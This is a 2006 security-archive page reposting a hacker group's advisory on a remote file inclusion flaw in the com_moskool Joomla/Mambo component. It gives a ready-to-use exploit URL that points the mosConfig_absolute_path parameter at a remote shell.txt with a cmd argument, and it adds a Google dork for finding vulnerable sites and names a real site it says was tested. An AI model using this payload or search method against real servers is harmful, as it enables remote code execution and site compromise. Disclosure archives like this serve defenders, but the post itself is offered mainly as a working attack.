Computer Security

Security Advisory: com_moskool (admin.moskool.php) Remote File Include Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] Content Management Framework "G3" - XSS Vulnerability in Search Function

  [Full-disclosure] X-Statics 1.20 SQL Injection Vulnerability

  [Full-disclosure] X-Protection 1.10 SQL Injection Vulnerability

  [Full-disclosure] X-Poll SQL Injection Vulnerability

From:Saudi Hackrz <Saudi.Unix_(at)_Hotmail.com>
Date:02.08.2006
Subject:com_moskool (admin.moskool.php) Remote File Include Vulnerabilities

By saudi hackrz

Rish : High
---------------------------------------
test on tis site : www.filters.ru
---------------------------------------

google : allinurl:"com_moskool" or "moskool"

Exploit :

http://[target]/component/option,com_moskool/Itemid,34/admin.moskool.
php?mosConfig_absolute_path?=http://sit/shell.txt?cmd

---------------------------------------

- SnIpEr.SA , KING18, BLACK HOURS, AL-ARAAB,

------------------------------------------------------------------------

-------

Contact:

~~~~~~~

Nick: saudi hackrz

E-mail: saudi.unix[at]hotmail[dot]Com

site: http://www.3asfh.net

End :)
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server